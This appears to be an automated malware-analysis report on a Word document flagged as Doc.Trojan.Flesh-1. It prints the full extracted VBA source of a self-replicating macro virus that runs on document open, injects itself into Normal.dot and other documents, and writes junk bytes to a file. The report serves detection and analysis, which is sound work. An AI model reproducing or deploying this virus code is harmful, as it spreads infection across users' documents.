MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This document contains a malicious VBA macro, identified by the 'Doc.Trojan.Flesh-1' ClamAV signature. The macro is designed to infect other documents by copying itself into the Normal.dot template and potentially other documents, as indicated by the 'Document_Open' and 'AutoOpen' macro firings. The script attempts to spread by injecting its code into the 'Normal.dot' template, suggesting a self-propagation mechanism.
Heuristics 5
-
ClamAV: Doc.Trojan.Flesh-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Flesh-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12634 bytes |
SHA-256: 7532647f5a082c277c8fbfe9745834642b77333d7686a0aaaea4f5f421420965 |
|||
|
Detection
ClamAV:
Doc.Trojan.Flesh-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
GoSub Flesh:
'macro code of user
'macro code of user
'macro code of user
'macro code of user
'THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz
'let's have fun...
Flesh:
If Hook = 1 Then Exit Sub
Owner = ThisDocument.Name
If UCase(Owner) = "NORMAL.DOT" Then Ways = 1 Else Ways = 0
Select Case Ways
Case 0
For c = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
Next c
For i = 1 To Carrier.CountOfLines
If Carrier.Lines(i, 1) = "Flesh:" Then
For x = i To Carrier.CountOfLines - 1
VC = VC & Carrier.Lines(x, 1) & Chr(13)
Next x
VC = Left(VC, Len(VC) - 1)
i = x
End If
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
Set ToOwn = NormalTemplate.VBProject.VBComponents(i).CodeModule
If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo FAllDoneP
For x = 1 To ToOwn.CountOfLines + 1
If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
Next x
FAllDoneP:
Next i
GoTo DeadFlesh
Case 1
For c = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
Next c
For i = 1 To Carrier.CountOfLines
If Carrier.Lines(i, 1) = "Flesh:" Then
For x = i To Carrier.CountOfLines - 1
VC = VC & Carrier.Lines(x, 1) & Chr(13)
Next x
VC = Left(VC, Len(VC) - 1)
i = x
End If
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
Set ToOwn = ActiveDocument.VBProject.VBComponents(i).CodeModule
If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo PAllDoneF
For x = 1 To ToOwn.CountOfLines + 1
If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
Next x
PAllDoneF:
Next i
End Select
DeadFlesh:
EatUp = Int(Rnd * 50000000) + 10000000
Theef = Int(Rnd * 255)
Open "lo.sys" For Binary As #1
Put #1, EatUp, Theef
Close #1
Hook = 1
Return
End Sub
' Processing file: /opt/analyzer/scan_staging/1e84b0b26c20464fbae8cd27e59e25a3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15245 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' GoSub Flesh
' BoS 0x0000
' Line #2:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #3:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #4:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #5:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #6:
' QuoteRem 0x0000 0x003D "THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz"
' Line #7:
' QuoteRem 0x0000 0x0011 "let's have fun..."
' Line #8:
' Label Flesh
' Line #9:
' Ld Hook
' LitDI2 0x00
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.